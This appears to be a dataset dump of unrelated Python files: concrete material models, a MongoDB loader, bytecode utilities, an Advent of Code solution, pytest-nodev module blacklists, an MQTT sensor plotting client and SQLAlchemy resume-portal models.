self.attr_list.extend(['fy', 'fu', 'eu', 'ep', 'E', 'v', 'G', 'p', 'tension', 'compression'])
# ==============================================================================
# non-linear timber
# ==============================================================================
# ==============================================================================
# non-linear masonry
# ==============================================================================
# ==============================================================================
# non-linear concrete
# ==============================================================================
class Concrete(Material):
"""Elastic and plastic-cracking Eurocode based concrete material.
Parameters
----------
name : str
Material name.
fck : float
Characteristic (5%) 28 day cylinder strength [MPa].
v : float
Poisson's ratio v [-].
p : float
Density [kg/m3].
fr : list
Failure ratios.
Notes
-----
- The concrete model is based on Eurocode 2 up to fck=90 MPa.
"""
def __init__(self, name, fck, v=0.2, p=2400, fr=None):
Material.__init__(self, name=name)
de = 0.0001
fcm = fck + 8
Ecm = 22 * 10**3 * (fcm / 10.)**0.3
ec1 = min(0.7 * fcm**0.31, 2.8) * 0.001
ecu1 = 0.0035 if fck < 50 else (2.8 + 27 * ((98 - fcm) / 100.)**4) * 0.001
k = 1.05 * Ecm * ec1 / fcm
e = [i * de for i in range(int(ecu1 / de) + 1)]
ec = [ei - e[1] for ei in e[1:]]
fctm = 0.3 * fck**(2. / 3.) if fck <= 50 else 2.12 * log(1 + fcm / 10.)
f = [10**6 * fcm * (k * (ei / ec1) - (ei / ec1)**2) / (1. + (k - 2) * (ei / ec1)) for ei in e]
E = f[1] / e[1]
ft = [1., 0.]
et = [0., 0.001]
if not fr:
fr = [1.16, fctm / fcm]
self.__name__ = 'Concrete'
self.name = name
self.fck = fck * 10.**6
self.E = {'E': E}
self.v = {'v': v}
self.G = {'G': 0.5 * E / (1 + v)}
self.p = p
self.tension = {'f': ft, 'e': et}
self.compression = {'f': f[1:], 'e': ec}
self.fratios = fr
self.attr_list.extend(['fck', 'fratios', 'E', 'v', 'G', 'p', 'tension', 'compression'])
class ConcreteSmearedCrack(Material):
"""Elastic and plastic, cracking concrete material.
Parameters
----------
name : str
Material name.
E : float
Young's modulus E [Pa].
v : float
Poisson's ratio v [-].
p : float
Density [kg/m3].
fc : list
Plastic stress data in compression [Pa].
ec : list
Plastic strain data in compression [-].
ft : list
Plastic stress data in tension [-].
et : list
Plastic strain data in tension [-].
fr : list
Failure ratios.
"""
def __init__(self, name, E, v, p, fc, ec, ft, et, fr=[1.16, 0.0836]):
Material.__init__(self, name=name)
self.__name__ = 'ConcreteSmearedCrack'
self.name = name
self.E = {'E': E}
self.v = {'v': v}
self.G = {'G': 0.5 * E / (1 + v)}
self.p = p
self.tension = {'f': ft, 'e': et}
self.compression = {'f': fc, 'e': ec}
self.fratios = fr
self.attr_list.extend(['E', 'v', 'G', 'p', 'tension', 'compression', 'fratios'])
class ConcreteDamagedPlasticity(Material):
"""Damaged plasticity isotropic and homogeneous material.
Parameters
----------
name : str
Material name.
E : float
Young's modulus E [Pa].
v : float
Poisson's ratio v [-].
p : float
Density [kg/m3].
damage : list
Damage parameters.
hardening : list
Compression hardening parameters.
stiffening : list
Tension stiffening parameters.
"""
def __init__(self, name, E, v, p, damage, hardening, stiffening):
Material.__init__(self, name=name)
self.__name__ = 'ConcreteDamagedPlasticity'
self.name = name
self.E = {'E': E}
self.v = {'v': v}
self.G = {'G': 0.5 * E / (1 + v)}
self.p = p
self.damage = damage
self.hardening = hardening
self.stiffening = stiffening
self.attr_list.extend(['E', 'v', 'G', 'p', 'damage', 'hardening', 'stiffening'])
# ==============================================================================
# thermal
# ==============================================================================
class ThermalMaterial(Material):
"""Class for thermal material properties.
Parameters
----------
name : str
Material name.
conductivity : list
Pairs of conductivity and temperature values.
p : list
Pairs of density and temperature values.
sheat : list
Pairs of specific heat and temperature values.
"""
def __init__(self, name, conductivity, p, sheat):
Material.__init__(self, name=name)
self.__name__ = 'ThermalMaterial'
self.name = name
self.conductivity = conductivity
self.p = p
self.sheat = sheat
self.attr_list.extend(['p', 'conductivity', 'sheat'])
| 26.242222 | 106 | 0.474807 | 1,349 | 11,809 | 4.034099 | 0.156412 | 0.061742 | 0.041896 | 0.041161 | 0.442852 | 0.376148 | 0.372473 | 0.314774 | 0.295663 | 0.286476 | 0 | 0.022158 | 0.296808 | 11,809 | 449 | 107 | 26.300668 | 0.633189 | 0.410873 | 0 | 0.386503 | 0 | 0 | 0.090792 | 0.008049 | 0 | 0 | 0 | 0 | 0 | 1 | 0.07362 | false | 0 | 0.02454 | 0.006135 | 0.171779 | 0.030675 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfa749699de26602b2730662f9b8a7ff680aac28 | 365 | py | Python | utilities/mongodb/insert.py | sosomasox/adl | 1afc2f385cbae6f1d4fefa5534f194621e4460c4 | [
"MIT"
] | null | null | null | utilities/mongodb/insert.py | sosomasox/adl | 1afc2f385cbae6f1d4fefa5534f194621e4460c4 | [
"MIT"
] | null | null | null | utilities/mongodb/insert.py | sosomasox/adl | 1afc2f385cbae6f1d4fefa5534f194621e4460c4 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
from pymongo import MongoClient
import json
import ast
client = MongoClient('mongodb://localhost:27017/')
db = client.adl
collection = db.adlmodels
with open('../data/going_out.jsonl', 'r') as fp:
for data in fp.readlines():
data = data.strip()
data_dit = ast.literal_eval(data)
collection.insert_one(data_dit)
| 22.8125 | 50 | 0.690411 | 51 | 365 | 4.843137 | 0.705882 | 0.05668 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020067 | 0.180822 | 365 | 15 | 51 | 24.333333 | 0.80602 | 0.057534 | 0 | 0 | 0 | 0 | 0.145773 | 0.142857 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.272727 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfa8cb6c6419a3d2b51a4b0411b2675939d36c2f | 4,087 | py | Python | omnibus/code.py | wrmsr/omnibus | 3c4ef5eb17b0fff8593fa6a2284337bf193c18d3 | [
"BSD-3-Clause"
] | 2 | 2020-06-17T19:54:09.000Z | 2020-06-18T20:10:26.000Z | omnibus/code.py | wrmsr/omnibus | 3c4ef5eb17b0fff8593fa6a2284337bf193c18d3 | [
"BSD-3-Clause"
] | null | null | null | omnibus/code.py | wrmsr/omnibus | 3c4ef5eb17b0fff8593fa6a2284337bf193c18d3 | [
"BSD-3-Clause"
] | null | null | null | import dis
import gc
import opcode
import sys
import textwrap
import types
import typing as ta
from . import lang
Code = types.CodeType
Function = types.FunctionType
Frame = types.FrameType
CODE_ARGS = [
'argcount',
'kwonlyargcount',
'nlocals',
'stacksize',
'flags',
'code',
'consts',
'names',
'varnames',
'filename',
'name',
'firstlineno',
'lnotab',
'freevars',
'cellvars',
]
if sys.version_info[1] > 7:
CODE_ARGS.insert(1, 'posonlyargcount')
CO_FLAG_VALUES = {v: k for k, v in dis.COMPILER_FLAG_NAMES.items()}
CO_OPTIMIZED: int = CO_FLAG_VALUES['OPTIMIZED']
CO_NEWLOCALS: int = CO_FLAG_VALUES['NEWLOCALS']
CO_VARARGS: int = CO_FLAG_VALUES['VARARGS']
CO_VARKEYWORDS: int = CO_FLAG_VALUES['VARKEYWORDS']
CO_NESTED: int = CO_FLAG_VALUES['NESTED']
CO_GENERATOR: int = CO_FLAG_VALUES['GENERATOR']
CO_NOFREE: int = CO_FLAG_VALUES['NOFREE']
CO_COROUTINE: int = CO_FLAG_VALUES['COROUTINE']
CO_ITERABLE_COROUTINE: int = CO_FLAG_VALUES['ITERABLE_COROUTINE']
CO_ASYNC_GENERATOR: int = CO_FLAG_VALUES['ASYNC_GENERATOR']
FUNCTION_ARGS = [
'code',
'globals',
'name',
'defaults',
'closure',
]
FUNC_NONE = 0
FUNC_DEFAULTS = 1
FUNC_KWDEFAULTS = 2
FUNC_ANNOTATIONS = 4
FUNC_CLOSURE = 8
class CallTypes:
def __iter__(self):
for k, v in type(self).__dict__.items():
if callable(v) and not k.startswith('_'):
yield v
def _visit(self, *args, **kwargs):
pass
def nullary(self):
return self._visit()
def arg(self, arg):
return self._visit(arg)
def default(self, default=None):
return self._visit(default)
def varargs(self, *varargs):
return self._visit(*varargs)
def kwonly(self, *, kwonly=None):
return self._visit(kwonly=kwonly)
if sys.version_info[1] > 7:
exec(textwrap.dedent("""
def posonly(self, /, posonly):
return self._visit(posonly)
"""), globals(), locals())
def kwargs(self, **kwargs):
return self._visit(**kwargs)
def all(self, arg, *varargs, default=None, **kwargs):
return self._visit(arg, *varargs, default=default, **kwargs)
def all2(self, arg0, arg1, *varargs, default0=None, default1=None, **kwargs):
return self._visit(arg0, arg1, *varargs, default0=default0, default1=default1, **kwargs)
CALL_TYPES = CallTypes()
class _Op(lang.Final):
def __getattr__(self, opname: str) -> int:
return opcode.opmap[opname]
op = _Op()
def make_cell(value):
def fn():
nonlocal value
return fn.__closure__[0]
def get_code_flag_names(flags: int) -> ta.List[str]:
return [k for k, v in CO_FLAG_VALUES.items() if flags & v]
def recode_func(func: Function, code_bytes: ta.Union[bytes, bytearray]) -> ta.Iterable[ta.Any]:
codeargs = [getattr(func.__code__, f'co_{k}') for k in CODE_ARGS]
codeargs[CODE_ARGS.index('code')] = bytes(code_bytes)
code = Code(*codeargs)
funcargs = [getattr(func, f'__{k}__') for k in FUNCTION_ARGS]
funcargs[FUNCTION_ARGS.index('code')] = code
return funcargs
def instruction_bytes(instrs: ta.Iterable[dis.Instruction]) -> bytes:
return bytes(b if b is not None else 0 for instr in instrs for b in [instr.opcode, instr.arg])
class AmbiguousFrameException(Exception):
pass
def get_frame_function(frame: Frame) -> Function:
"""
AmbiguousFrameException should always be handled gracefully - in the presence of multiple threads (and even
recursive invocations within a single thread) the originally invoking function may have already had its code
patched. Callers of this code should be robust enough for this to only result in wasted work that will likely be
redone and corrected in subsequent invocations.
"""
refs = gc.get_referrers(frame.f_code)
funcs = [
r for r in refs if (
isinstance(r, Function) and
r.__code__ is frame.f_code
)
]
if len(funcs) != 1:
raise AmbiguousFrameException
return funcs[0]
| 24.473054 | 116 | 0.663567 | 541 | 4,087 | 4.809612 | 0.330869 | 0.027671 | 0.055342 | 0.057648 | 0.076095 | 0.013836 | 0 | 0 | 0 | 0 | 0 | 0.007832 | 0.218987 | 4,087 | 166 | 117 | 24.620482 | 0.807331 | 0.092244 | 0 | 0.070175 | 0 | 0 | 0.101304 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.149123 | false | 0.017544 | 0.070175 | 0.096491 | 0.377193 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfa9f514b2c99066b32a9c8b4d3db858314b200e | 2,928 | py | Python | 2021/day20.py | tangarts/advent-of-code | 5879fbec1a5377d1288666a357b029f6345d4a5d | [
"MIT"
] | null | null | null | 2021/day20.py | tangarts/advent-of-code | 5879fbec1a5377d1288666a357b029f6345d4a5d | [
"MIT"
] | null | null | null | 2021/day20.py | tangarts/advent-of-code | 5879fbec1a5377d1288666a357b029f6345d4a5d | [
"MIT"
] | null | null | null |
from advent_of_code.core import parse_input, flatten
raw = """..#.#..#####.#.#.#.###.##.....###.##.#..###.####..#####..#....#..#..##..##
#..######.###...####..#..#####..##..#.#####...##.#.#..#.##..#.#......#.###
.######.###.####...#.##.##..#..#..#####.....#.#....###..#.##......#.....#.
.#..#..##..#...##.######.####.####.#.#...#.......#..#.#.#...####.##.#.....
.#..#...##.#.##..#...##.#.##..###.#......#.#.......#.#.#.####.###.##...#..
...####.#..#..#.##.#....##..#.####....##...##..#...#......#.#.......#.....
..##..####..#...#.#.#...##..#.#..###..#####........#..####......#..#
#..#.
#....
##..#
..#..
..###"""
test_enhance, test_input_image = parse_input(raw, sep="\n\n", parser=lambda s: s.replace("#", "1").replace(".", "0"))
test_enhance = "".join(test_enhance.replace("\n", ""))
test_input_image = [list(i) for i in test_input_image.split("\n")]
def pad(matrix: list, i) -> list:
"""add zeros to matrix represented as List[str]
"['010', '100', '110']" -> ["00000", "00100", "01000", "01100"]
"""
matrix = [[str(i), *row, str(i)] for row in matrix]
n = len(matrix[0])
return [[str(i) for _ in range(n)]] + matrix + [[str(i) for _ in range(n)]]
def kernel(matrix, point, background="0"):
m, n = len(matrix), len(matrix[0])
pixels = []
x, y = point
# get binary string using kernel
for dx, dy in [(-1, -1), (-1, 0), (-1, 1), (0, -1),
(0, 0), (0, 1), (1, -1), (1, 0), (1, 1)]:
if 0 <= dx + x < m and 0 <= dy + y < n:
pixels.append(matrix[x + dx][y + dy])
else:
pixels.append(background)
index = int("".join(pixels), 2)
return (point, index)
def enhance_pixels(matrix, indexes, enhance):
for point, index in indexes.items():
x, y = point
pixel = enhance[index]
matrix[x][y] = pixel
return matrix
def new_pixels(matrix, background):
indexes = dict()
for i in range(len(matrix)):
for j in range(len(matrix[0])):
point, index = kernel(matrix, (i, j), background)
indexes[point] = index
return indexes
def enhance_image(matrix, enhance, background):
matrix = pad(matrix, background)
pixels = new_pixels(matrix, background)
matrix = enhance_pixels(matrix, pixels, enhance)
return matrix
def run(matrix, enhance, n):
for i in range(n):
matrix = enhance_image(matrix, enhance, str(i % 2))
return list(flatten(matrix)).count("1")
def print_matrix(matrix):
print("\n".join(["".join(i) for i in matrix]))
enhance, input_image = parse_input('data/input20.txt', sep="\n\n",
parser=lambda s: s.replace("#", "1").replace(".", "0"), test=False) # 5326
enhance = "".join(enhance.replace("\n", ""))
input_image = [list(i) for i in input_image.split("\n")]
# part 1
assert run(input_image, enhance, 2) == 5583
# part 2
# print(run(input_image, enhance, 50))
| 32.175824 | 117 | 0.470628 | 342 | 2,928 | 3.947368 | 0.248538 | 0.059259 | 0.022222 | 0.015556 | 0.12 | 0.12 | 0.088889 | 0.057778 | 0.057778 | 0.057778 | 0 | 0.031901 | 0.197063 | 2,928 | 90 | 118 | 32.533333 | 0.542322 | 0.06694 | 0 | 0.065574 | 0 | 0 | 0.218981 | 0.189069 | 0 | 0 | 0 | 0 | 0.016393 | 1 | 0.114754 | false | 0 | 0.016393 | 0 | 0.229508 | 0.032787 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfac716a70e1d5acb5b1e13b1f148e9c8bcc5ce8 | 4,406 | py | Python | pytest_nodev/blacklists.py | nodev-io/pytest-wish | 14c9ef2a3891ac245fe572f6fb8e4649930349cb | [
"MIT"
] | 21 | 2016-02-25T18:00:39.000Z | 2021-12-13T02:58:24.000Z | pytest_nodev/blacklists.py | nodev-io/pytest-wish | 14c9ef2a3891ac245fe572f6fb8e4649930349cb | [
"MIT"
] | 18 | 2016-02-18T20:38:47.000Z | 2016-08-25T07:26:14.000Z | pytest_nodev/blacklists.py | nodev-io/pytest-wish | 14c9ef2a3891ac245fe572f6fb8e4649930349cb | [
"MIT"
] | 6 | 2016-02-26T13:45:41.000Z | 2016-08-25T05:45:58.000Z | # -*- coding: utf-8 -*-
#
# Copyright (c) 2016 Alessandro Amici
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
"""
Regex's that blacklist problem modules and objects.
Potentially dangerous, crashing, hard hanging or simply annoying objects
belonging to the standard library and to and the pytest-nodev dependencies
are unconditionally blacklisted so that new users can test ``--candidates-from-stdlib``
without bothering with OS-level isolation.
"""
# python 2 support via python-future
from __future__ import unicode_literals
from builtins import open
MODULE_BLACKLIST = [
# underscore 'internal use' modules and objects
r'_|.*\._',
# crash
'icopen',
'ntpath',
'tests?',
r'.*\.tests?',
r'.*\.testing',
'xml.etree.ElementTree',
'pycallgraph',
'queue',
'idlelib',
# hangs
'itertools',
'bsddb',
# dangerous
'subprocess',
'smtpd',
# annoying
'antigravity', # not sure about this one :)
'this', # and about this one too!
'pydoc',
'tkinter',
'turtle',
'asyncio',
]
OBJECT_BLACKLIST = [
# underscore 'internal use' modules and objects
r'_|.*\._',
'.*:_',
# pytest internals
'_pytest.runner:exit',
'_pytest.runner:skip',
'_pytest.skipping:xfail',
'pytest_timeout:timeout_timer',
# unconditional exit
'faulthandler:_sigsegv',
'posix:abort',
'posix:_exit',
'posix:fork',
'posix:forkpty',
'pty:fork',
'_signal:default_int_handler',
'signal:default_int_handler',
'atexit.register',
# low level crashes
'numpy.fft.fftpack_lite:cffti',
'numpy.fft.fftpack_lite:rffti',
'appnope._nope:beginActivityWithOptions',
'ctypes:string_at',
'ctypes:wstring_at',
'gc:_dump_rpy_heap',
'gc:dump_rpy_heap',
'matplotlib._image:Image',
'getpass:getpass',
'getpass:unix_getpass',
'ensurepip:_run_pip',
'idlelib.rpc:SocketIO',
'numpy.core.multiarray_tests',
'.*base64.*code',
# uninterruptable hang
'compiler.ast:AugAssign',
'IPython.core.getipython:get_ipython',
'IPython.terminal.embed:InteractiveShellEmbed',
'IPython.terminal.interactiveshell:TerminalInteractiveShell',
'itertools:cycle',
'itertools:permutations',
'itertools:repeat',
'pydoc:apropos',
'logging.config:listen',
'multiprocessing.dummy.connection:Listener',
'multiprocessing.dummy.connection:Pipe',
# dangerous
'os.mkdir',
'os.command',
'pip.utils:rmtree',
'platform:popen',
'posix:popen',
'shutil.rmtree',
'turtle.write_docstringdict',
'multiprocessing.semaphore_tracker:main',
# annoying
'urllib.request:URLopener',
'urllib.request:FancyURLopener',
'urllib.request:urlopen',
'urllib.response:addbase',
'aifc.Error',
'aifc.Aifc_write',
'asyncore:file_dispatcher',
'asyncore:file_wrapper',
'sunau:open',
'sunau:Error',
'sunau:Au_write',
'tempfile:TemporaryFile',
'urllib.robotparser:RobotFileParser',
'wave:Wave_write',
'tempfile:mkdtemp',
'tempfile:mkstemp',
'tempfile:mktemp',
'multiprocessing.util',
]
# FIXME: this is a (hopefully!) temporary hack to permit adding to the object blacklist
try:
with open('object_blacklist.txt') as fp:
OBJECT_BLACKLIST += [line.rstrip('\n') for line in fp if line.strip()]
except IOError:
pass
| 27.886076 | 87 | 0.687472 | 519 | 4,406 | 5.741811 | 0.579961 | 0.02953 | 0.017114 | 0.020134 | 0.032215 | 0.032215 | 0.032215 | 0.032215 | 0 | 0 | 0 | 0.002254 | 0.194281 | 4,406 | 157 | 88 | 28.063694 | 0.837183 | 0.408534 | 0 | 0.020619 | 0 | 0 | 0.593518 | 0.324873 | 0 | 0 | 0 | 0.006369 | 0 | 1 | 0 | false | 0.030928 | 0.020619 | 0 | 0.020619 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfacebc149bcde45d8b837419f726ea675713269 | 4,574 | py | Python | streaming_plot_client.py | Sensirion/libsensors-python | dda92824ce073b4b25f8db90150e90f092275a39 | [
"BSD-3-Clause"
] | 21 | 2015-12-31T00:35:37.000Z | 2019-10-17T08:17:07.000Z | streaming_plot_client.py | Sensirion/libsensors-python | dda92824ce073b4b25f8db90150e90f092275a39 | [
"BSD-3-Clause"
] | 5 | 2015-09-28T13:47:44.000Z | 2018-12-12T22:36:09.000Z | streaming_plot_client.py | Sensirion/libsensors-python | dda92824ce073b4b25f8db90150e90f092275a39 | [
"BSD-3-Clause"
] | 15 | 2015-11-10T10:11:35.000Z | 2021-05-20T08:41:18.000Z | #! /usr/bin/python
# -*- coding: utf-8 -*-
"""
Sample appplication that connects to a mqtt server and plots all sensor data.
It is possible to subscribe to only some sensors or to all of them by modifying
the subscription topic.
To run the script you need to install the paho MQTT library and PyQt as listed
in requirements.txt.
"""
from collections import deque
import json
from PyQt4 import QtCore, QtGui, Qt
from PyQt4.Qwt5 import QwtPlot, QwtPlotCurve, QwtLegend
import paho.mqtt.client as mqtt
MAX_LENGTH = 1000
LEGENDS = {
'sl/min': 'Flow',
'Pa': 'Differential Pressure',
u'°C': 'Temperature',
'%': 'Humidity'
}
class PlotWindow(QtGui.QMainWindow):
client_message = QtCore.pyqtSignal(object)
colors = (
Qt.Qt.red,
Qt.Qt.blue,
Qt.Qt.magenta,
Qt.Qt.darkCyan,
Qt.Qt.yellow,
Qt.Qt.green,
)
color_index = -1
def __init__(self, mqtt_client):
super(PlotWindow, self).__init__()
self._plots = {}
# Create the GUI refresh timer
self._mqtt_client = mqtt_client
self._first_timestamp = None
self.setup_ui()
def next_color(self):
self.color_index += 1
if self.color_index == len(self.colors):
self.color_index = 0
return self.colors[self.color_index]
def setup_ui(self):
self.setObjectName("MainWindow")
self.resize(800, 600)
self.setWindowTitle('Sensirion Plot')
central_widget = QtGui.QWidget(self)
central_widget.setObjectName("centralwidget")
self.vertical_layout = QtGui.QVBoxLayout(central_widget)
self.vertical_layout.setObjectName("verticalLayout")
self.setCentralWidget(central_widget)
# hook events
self._mqtt_client.on_connect = self.on_connect
# we need the signal so the event is processed on the GUI thread
self._mqtt_client.on_message = lambda c, d, msg: self.client_message.emit(msg)
self.client_message.connect(self.on_client_message)
def on_client_message(self, message):
payload = json.loads(message.payload)
sensor = message.topic.split('/')[-2]
if not sensor in self._plots:
self.add_plot(sensor, payload['units'])
if not self._first_timestamp:
self._first_timestamp = payload['timestamp']
plot = self._plots[sensor]
plot.time.append(payload['timestamp'] - self._first_timestamp)
for i, value in enumerate(payload['values']):
plot.data[i].append(value)
plot.curves[i].setData(list(plot.time), list(plot.data[i]))
plot.replot()
return
def add_plot(self, name, units):
# legend
legend = QwtLegend()
legend.setFrameStyle(Qt.QFrame.Box | Qt.QFrame.Sunken)
legend.setItemMode(QwtLegend.ClickableItem)
# plot
plot = QwtPlot(self)
plot.setTitle(name.upper())
plot.setObjectName(name)
plot.setCanvasBackground(Qt.Qt.white)
plot.setAxisTitle(QwtPlot.xBottom, "time [s]")
plot.insertLegend(legend, QwtPlot.RightLegend)
plot.time = deque(maxlen=MAX_LENGTH)
plot.data = []
plot.curves = []
for i, unit in enumerate(units):
position = QwtPlot.yLeft if i == 0 else QwtPlot.yRight
curve = QwtPlotCurve(LEGENDS[unit])
curve.setPen(Qt.QPen(self.next_color(), 2))
curve.setYAxis(position)
curve.attach(plot)
plot.enableAxis(position)
plot.setAxisTitle(position, unit)
plot.curves.append(curve)
plot.data.append(deque(maxlen=MAX_LENGTH))
self.vertical_layout.addWidget(plot)
self._plots[name] = plot
# The callback for when the client receives a CONNACK response from the server.
def on_connect(self, client, userdata, flags, rc):
print("Connected with result code " + str(rc))
# Subscribing in on_connect() means that if we lose the connection and
# reconnect then subscriptions will be renewed.
# this subscribes only to the sfm sensor
# client.subscribe("sensors/+/sfm/#")
# this subscribes to all sensors
client.subscribe("sensors/#")
if __name__ == "__main__":
import sys
client = mqtt.Client()
app = QtGui.QApplication(sys.argv)
mainWindow = PlotWindow(client)
mainWindow.show()
client.connect("192.168.1.10")
client.loop_start()
try:
sys.exit(app.exec_())
finally:
client.loop_stop()
| 32.671429 | 86 | 0.638828 | 561 | 4,574 | 5.081996 | 0.413547 | 0.024553 | 0.019642 | 0.013329 | 0.016836 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008517 | 0.255575 | 4,574 | 139 | 87 | 32.906475 | 0.828488 | 0.161128 | 0 | 0 | 0 | 0 | 0.052411 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.06 | false | 0 | 0.06 | 0 | 0.18 | 0.01 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfadeebda3d888464f736b1d2628712419a57a4c | 4,550 | py | Python | services/backend/app/models.py | miguelalb/resume-portal-fastapi | 286f732510925c5ad3760ca2af82098ed78e0dd9 | [
"BSD-3-Clause"
] | 1 | 2022-02-28T02:29:02.000Z | 2022-02-28T02:29:02.000Z | services/backend/app/models.py | miguelalb/resume-portal-fastapi | 286f732510925c5ad3760ca2af82098ed78e0dd9 | [
"BSD-3-Clause"
] | null | null | null | services/backend/app/models.py | miguelalb/resume-portal-fastapi | 286f732510925c5ad3760ca2af82098ed78e0dd9 | [
"BSD-3-Clause"
] | null | null | null | import uuid
from datetime import datetime
from sqlalchemy import Boolean, Column, ForeignKey, Integer, String, Text
from sqlalchemy.dialects.postgresql import UUID
from sqlalchemy.ext.declarative import declared_attr
from sqlalchemy.orm import relationship
from app.database import Base
class BaseMixin(object):
"""Shared properties and common functionality"""
@declared_attr
def __tablename__(cls):
return cls.__name__.lower()
id = Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4, index=True)
class TimestampMixin(object):
created_at = Column(String, default=datetime.utcnow().timestamp())
class CurrentMixin(object):
current = Column(Boolean, default=False)
class DeletedMixin(object):
deleted = Column(Boolean, default=False, nullable=True)
class User(Base, BaseMixin, TimestampMixin):
username = Column(String, index=True)
password = Column(String, index=True)
is_admin = Column(Boolean, default=False)
is_premium = Column(Boolean, default=False)
profile = relationship(
"UserProfile", cascade="all,delete", back_populates="user", uselist=False
)
def __str__(self):
return f"<User: {self.username}>"
class Template(Base, BaseMixin, TimestampMixin):
name = Column(String, index=True)
content = Column(Text)
premium = Column(Boolean, default=False, index=True)
user_profiles = relationship("UserProfile", back_populates="template")
def __str__(self):
return f"<Template: {self.name}>"
#TODO Add Portfolio, and Social medias - Linkedin etc to userprofile
class UserProfile(Base, BaseMixin, TimestampMixin):
first_name = Column(String)
last_name = Column(String)
public_name = Column(String)
summary = Column(String)
email = Column(String)
phone = Column(String)
designation = Column(String)
website = Column(String, nullable=True)
user_id = Column(UUID(as_uuid=True), ForeignKey("user.id"))
template_id = Column(UUID(as_uuid=True), ForeignKey("template.id"))
user = relationship("User", back_populates="profile")
skills = relationship(
"Skill", cascade="all,delete", back_populates="profile", lazy="joined"
)
jobs = relationship(
"Job", cascade="all,delete", back_populates="profile", lazy="joined"
)
educations = relationship(
"Education", cascade="all,delete", back_populates="profile", lazy="joined"
)
certifications = relationship(
"Certification", cascade="all,delete", back_populates="profile", lazy="joined"
)
template = relationship("Template", back_populates="user_profiles", lazy="joined")
def __str__(self):
return f"<Profile: {self.first_name} {self.last_name}>"
class Skill(Base, BaseMixin, DeletedMixin):
name = Column(String, index=True)
learning = Column(Boolean, default=False)
profile_id = Column(UUID(as_uuid=True), ForeignKey("userprofile.id"))
profile = relationship("UserProfile", back_populates="skills")
def __str__(self):
return f"<Skill: {self.name}>"
class Job(Base, BaseMixin, CurrentMixin, DeletedMixin):
company = Column(String, index=True)
designation = Column(String, index=True)
description = Column(Text)
startdate = Column(String)
enddate = Column(String, nullable=True)
profile_id = Column(UUID(as_uuid=True), ForeignKey("userprofile.id"))
profile = relationship("UserProfile", back_populates="jobs")
def __str__(self):
return f"<Job: {self.company}>"
class Education(Base, BaseMixin, CurrentMixin, DeletedMixin):
college = Column(String, index=True)
designation = Column(String)
description = Column(Text)
startdate = Column(String)
enddate = Column(String, nullable=True)
profile_id = Column(UUID(as_uuid=True), ForeignKey("userprofile.id"))
profile = relationship("UserProfile", back_populates="educations")
def __str__(self):
return f"<Education: {self.college}>"
class Certification(Base, BaseMixin, CurrentMixin, DeletedMixin):
name = Column(String, index=True)
issuing_organization = Column(String)
issue_date = Column(String)
expiration_date = Column(String, nullable=True)
credential_id = Column(String, nullable=True)
credential_url = Column(String, nullable=True)
profile_id = Column(UUID(as_uuid=True), ForeignKey("userprofile.id"))
profile = relationship("UserProfile", back_populates="certifications")
def __str__(self):
return f"<Certification: {self.name}>"
